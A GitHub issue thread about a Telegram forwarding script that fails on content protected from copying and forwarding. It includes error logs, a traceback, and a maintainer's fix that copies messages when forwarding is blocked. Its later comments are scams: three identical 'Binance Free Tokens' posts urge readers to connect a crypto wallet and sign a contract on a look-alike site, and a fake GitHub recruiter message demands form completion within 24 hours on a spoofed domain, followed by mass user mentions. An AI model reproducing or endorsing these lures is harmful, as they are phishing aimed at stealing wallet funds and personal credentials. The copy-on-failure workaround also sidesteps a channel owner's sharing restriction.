### ISSUE TITLE
Messages Not Forwarding From Source "Bot" ! 

### ISSUE THREAD

**Issue by mdm095** [edrickrenan/telegram-forwarder#4]
Hello ! There !

new issue found !

**List of issues:**

1. **cant** able to **forward messages** from the **source bot** **(which having "coping and forwarding restriction" )!** 
2. Forwarded message text shows "forwarded tag"  on destination channel! **(Pls Remove Forward Tag)**
3. Channels which are having "coping and forwarding restriction" not fowarding  chats ! showing this below errors

`2022-05-20 02:08:31 ERROR    Telegram says: [400 CHAT_FORWARDS_RESTRICTED] - The chat restricts forwarding content (caused by "messages.ForwardMessages")
`

**Comment by eliafino** [comment]
Hi, have you last version? Please launch git pull 😉

**Comment by mdm095** [comment]
Its already Up to date (Already Git Pulled)

**Comment by eliafino** [comment]
1. Fixed by last version of main.py
2. For me forwarded tag needed to know what channel the message comes from
3. In new version of main.py in case of forward error, bot copy paste original message.

**Comment by mdm095** [comment]
for your concern am testing the script right now ! still facing the same error  ! Git pulled and repo is up to date ! 
`2022-05-20 03:35:34 ERROR    Telegram says: [400 CHAT_FORWARDS_RESTRICTED] - The chat restricts forwarding content (caused by "messages.ForwardMessages")`

2. how can we remove the forward tag (i will change that locally)
3. Still Same error

**Comment by mdm095** [comment]
if i add line 21 :  [line21](https://github.com/edrickrenan/telegram-forwarder/blob/e4ece94a2960957458b1ec8f27155589b82afb97/main.py#L21) Messages are not being forwarded !
 **getting below error !**

```
Traceback (most recent call last):
  File "/home/mdm/.local/lib/python3.8/site-packages/pyrogram/dispatcher.py", line 242, in handler_worker
    await self.loop.run_in_executor(
  File "/usr/lib/python3.8/concurrent/futures/thread.py", line 57, in run
    result = self.fn(*self.args, **self.kwargs)
  File "main.py", line 21, in run
    Logger.info(f"Message Incoming - from {message.sender_chat.id, message.sender_chat.title}")
AttributeError: 'NoneType' object has no attribute 'id'
'NoneType' object has no attribute 'id'
Traceback (most recent call last):
  File "/home/mdm/.local/lib/python3.8/site-packages/pyrogram/dispatcher.py", line 242, in handler_worker
    await self.loop.run_in_executor(
  File "/usr/lib/python3.8/concurrent/futures/thread.py", line 57, in run
    result = self.fn(*self.args, **self.kwargs)
  File "main.py", line 21, in run
    Logger.info(f"Message Incoming - from {message.sender_chat.id, message.sender_chat.title}")
AttributeError: 'NoneType' object has no attribute 'id'
'NoneType' object has no attribute 'id'
Traceback (most recent call last):
  File "/home/mdm/.local/lib/python3.8/site-packages/pyrogram/dispatcher.py", line 242, in handler_worker
    await self.loop.run_in_executor(
  File "/usr/lib/python3.8/concurrent/futures/thread.py", line 57, in run
    result = self.fn(*self.args, **self.kwargs)
  File "main.py", line 21, in run
    Logger.info(f"Message Incoming - from {message.sender_chat.id, message.sender_chat.title}")
AttributeError: 'NoneType' object has no attribute 'id'
```
if i remove this line : [line21](https://github.com/edrickrenan/telegram-forwarder/blob/e4ece94a2960957458b1ec8f27155589b82afb97/main.py#L21) 

Messages are being forwarded (works when no Copying forwarding restricted)

getting this error
ERROR Telegram says: [400 CHAT_FORWARDS_RESTRICTED] - The chat restricts forwarding content (caused by "messages.ForwardMessages")

**Comment by eliafino** [comment]
Can you try to clone into new directory?
You took a look at the contents of your current file main py?

**Comment by eliafino** [comment]
Mmm, are you trying to forward messages from another bot? Is the source a bot?

**Comment by mdm095** [comment]
> Mmm, are you trying to forward messages from another bot? Is the source a bot?

Yes ! am trying to forward the messages from the bot (source) ! and the source (bot) having "copying and forward restriction"

**Comment by mdm095** [comment]
> Can you try to clone into new directory? You took a look at the contents of your current file main py?

Manually copy pasted the Main.py  to my local source still getting the same error!

**Comment by eliafino** [comment]
> > Mmm, are you trying to forward messages from another bot? Is the source a bot?
> 
> Yes ! am trying to forward the messages from the bot (source) ! and the source (bot) having "copying and forward restriction"

Oh, ok... from bot. This changes everything 😅

**Comment by mdm095** [comment]
> > > Mmm, are you trying to forward messages from another bot? Is the source a bot?
> > 
> > 
> > Yes ! am trying to forward the messages from the bot (source) ! and the source (bot) having "copying and forward restriction"
> 
> Oh, ok... from bot. This changes everything sweat_smile

some function is working fine! some messages are having "copy forward disabled" in same chat (source) 
which is getting forwarded from bot (source) unless i removed [line21](https://github.com/edrickrenan/telegram-forwarder/blob/e4ece94a2960957458b1ec8f27155589b82afb97/main.py#L21) ! 

some messages which are "copying forward restricted" not getting forward from bot (source)! 

Note: iam mentioning about same chat scenario which is bot chat as (source channel)

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by thulbahri** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by chenwynn** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
willnguyen1312, @southppp22, @SOSO-eng, @dayksx, @Feuda, @willshiao, @ivanzhelyazkov, @duggalr, @G-zhanghao, @escottalexander, @Osepatrick, @S4ilormoon, @flyer88, @moteesh-in2tive, @icarumbas, @connorads, @ClockTwelve, @jayZOU, @TO19, @the-real-astro
